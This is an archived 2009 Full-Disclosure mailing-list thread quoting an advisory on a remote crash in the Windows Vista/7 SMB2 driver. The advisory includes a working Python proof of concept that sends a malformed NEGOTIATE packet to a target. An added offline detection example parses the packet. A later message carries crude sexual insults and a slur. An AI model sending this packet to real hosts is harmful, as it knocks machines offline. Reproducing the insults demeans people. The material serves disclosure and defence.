Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread randomguy
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How come all I hear about is n3td3v, and I see no one crying out
loud about this:
http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

is fd all 'bout trolls nao?

- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=

I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- -
Windows Vista and newer Windows versions come with a new SMB version
named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends
to an SMB server, and it is used to identify the SMB dialect that
will be used for further communication.

IV. PROOF OF CONCEPT
- -

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA
#
# Usage: python Smb-Bsod.py <target-ip>

import sys
from socket import socket

if len(sys.argv) != 2:
    sys.exit("usage: %s <target-ip>" % sys.argv[0])
host = (sys.argv[1], 445)

buff = (
    b"\x00\x00\x00\x90"  # NetBIOS session message (type 0x00), length 0x90
    b"\xff\x53\x4d\x42"  # Server Component: SMB
    b"\x72\x00\x00\x00"  # Negotiate Protocol (command 0x72), NT status
    b"\x00\x18\x53\xc8"  # status, Flags 0x18 & Flags2 0xc853
    b"\x00\x26"          # Process ID High: --> :) normal value should be "\x00\x00"
    b"\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"  # dialect list ends with "SMB 2.002"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
- -
An attacker can remotely crash, without any user interaction, any
Vista/Windows 7 machine with SMB enabled.
Windows XP and 2k are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008,
as it uses the same SMB2.0 driver (not tested).

VII. SOLUTION
- -
Vendor contacted, but no patch is available for the moment.
Disable the SMB feature and close its ports until a patch is provided.

VIII. REFERENCES
- -
http://microsoft.com

IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-----END PGP SIGNATURE-----

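The advisory quoted above says only that the request is the first SMB query a client sends and that the "Process ID High" field carries a value it normally would not. What follows is an added example, not code from the advisory or from Laurent Gaffié: it parses the NetBIOS session prefix and the 32-byte SMB1 header of a NEGOTIATE PROTOCOL REQUEST (field order as in MS-CIFS), pulls out Process ID High, and runs the checks a detection rule would key on. The request bytes are the PoC's, copied byte for byte; `build_negotiate`, `scan_dialects`, `check` and the wording of the findings are this example's own. It sends nothing and runs offline.

```python
"""Parse an SMB1 NEGOTIATE PROTOCOL REQUEST and flag the malformed Process ID High field.

Added example, not part of the advisory. Nothing is sent; the PoC bytes are parsed in memory.
"""
import struct

# 32-byte SMB1 header, little-endian: magic, command, NT status, flags, flags2,
# PIDHigh, signature, reserved, TID, PID, UID, MID
SMB_HDR = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

# Dialect list carried by the PoC, in its order.
DIALECTS = [
    "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
    "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002",
]

# The PoC request, copied from the advisory (dialect strings written as ASCII).
POC_REQUEST = (
    b"\x00\x00\x00\x90"                   # NetBIOS session message, length 0x90
    b"\xff\x53\x4d\x42"                   # \xffSMB
    b"\x72\x00\x00\x00"                   # SMB_COM_NEGOTIATE, NT status
    b"\x00\x18\x53\xc8"                   # status, flags 0x18, flags2 0xc853
    b"\x00\x26"                           # Process ID High: 0x26 ('&'); PoC says normal is 0x0000
    b"\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00"
    b"\x02PC NETWORK PROGRAM 1.0\x00" b"\x02LANMAN1.0\x00"
    b"\x02Windows for Workgroups 3.1a\x00" b"\x02LM1.2X002\x00"
    b"\x02LANMAN2.1\x00" b"\x02NT LM 0.12\x00" b"\x02SMB 2.002\x00"
)


def parse_request(pkt):
    """Split a NetBIOS session message into SMB1 header fields, WordCount, ByteCount and data."""
    if len(pkt) < 4 + SMB_HDR.size + 1:
        raise ValueError("packet shorter than NetBIOS prefix + SMB header + WordCount")
    nbss_len = int.from_bytes(pkt[1:4], "big")   # 3-byte big-endian length after the prefix
    smb = pkt[4:]
    (magic, command, _status, flags, flags2, pid_high,
     _signature, _reserved, tid, pid, uid, mid) = SMB_HDR.unpack_from(smb)
    if magic != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    word_count = smb[SMB_HDR.size]
    bc_off = SMB_HDR.size + 1 + 2 * word_count   # ByteCount follows the parameter words
    byte_count = (int.from_bytes(smb[bc_off:bc_off + 2], "little")
                  if len(smb) >= bc_off + 2 else None)
    return {
        "nbss_type": pkt[0], "nbss_len": nbss_len, "smb_len": len(smb),
        "command": command, "flags": flags, "flags2": flags2, "pid_high": pid_high,
        "tid": tid, "pid": pid, "uid": uid, "mid": mid, "word_count": word_count,
        "byte_count": byte_count, "tail": smb[bc_off + 2:],
    }


def scan_dialects(tail):
    """Lenient scan: every 0x02-prefixed, NUL-terminated dialect string in the data bytes."""
    out, i = [], 0
    while i < len(tail):
        if tail[i] != 0x02:
            i += 1
            continue
        end = tail.find(b"\x00", i + 1)
        if end < 0:
            break
        out.append(tail[i + 1:end].decode("ascii", "replace"))
        i = end + 1
    return out


def check(r):
    """Detection checks for a NEGOTIATE request; returns human-readable findings."""
    findings = []
    if r["command"] != SMB_COM_NEGOTIATE:
        return findings
    if r["pid_high"] != 0:
        findings.append("Process ID High is 0x%04x; NEGOTIATE normally carries 0x0000" % r["pid_high"])
    if r["smb_len"] != r["nbss_len"]:
        findings.append("NetBIOS length %d does not match %d SMB bytes on the wire"
                        % (r["nbss_len"], r["smb_len"]))
    if r["byte_count"] != len(r["tail"]):
        findings.append("ByteCount %s does not cover the %d trailing bytes"
                        % (r["byte_count"], len(r["tail"])))
    return findings


def build_negotiate(dialects, pid_high=0, pid=0xfeff):
    """Well-formed NEGOTIATE request for `dialects`; pid_high != 0 reproduces the PoC's field."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    hdr = SMB_HDR.pack(SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xc853, pid_high,
                       bytes(8), 0, 0, pid, 0, 0)
    smb = hdr + b"\x00" + len(data).to_bytes(2, "little") + data   # WordCount 0, ByteCount, data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb               # NetBIOS session message


if __name__ == "__main__":
    for label, pkt in (("PoC", POC_REQUEST), ("well-formed", build_negotiate(DIALECTS))):
        r = parse_request(pkt)
        print("%s: PIDHigh=0x%04x dialects=%s" % (label, r["pid_high"], scan_dialects(r["tail"])))
        for f in check(r):
            print("  !", f)
```

Keep the Process ID High check separate from the two length checks: a rule that locates the dialect list through ByteCount silently finds nothing on a request whose declared lengths do not match the wire, which is why `scan_dialects` reads the trailing bytes leniently instead of trusting ByteCount.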

Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread randomguy
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hey, buddy, you know spam filters sometimes can be stupid.
Don't implement a stupid filter in your head.
Just because I mention a troll in my email, have a hushmail
address, and post a link you assume I must be rickrolling you or
something?

I was really surprised when I heard that Gaffie's remote DoS could
in fact be remote code exec. Not a mention here, unless I missed
something.

That's the link I posted, and since I don't understand shit about
asm, I was expecting some feedback.

BTW, this is not a flame, but since you assumed I was trolling, I
just wanted to make clear I was providing info, and waiting for
feedback on it.



PS : I use hush as disposable addresses, and it's none of your
business. And I don't mind my sister sleeping around, she's just a
whore anyway.

- --
Does anybody care?

In fact does anybody who contributes anything useful to this list use
Hushmail? (at this time I am too lazy to look). If not I can set my
spam filter. Amusing as it has been, it has grown tiresome.

btw mr lawyer/mr random guy etc. my dick is bigger than yours, at
least that's what your wife and sister tell me ;-)

I am a noob with skills marginally better (debatable) than the
average spotty first line support analyst. Therefore constructive
criticism is welcomed, anything else is ignored unless I am bored or
stupid enough to read/respond to these postings after a bottle of
Shiraz.

regards
the learner aka
MrX

ps I wish I didn't have so much to learn.
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0
wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/
u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6
qBRkqZE=
=ymH2
-----END PGP SIGNATURE-----
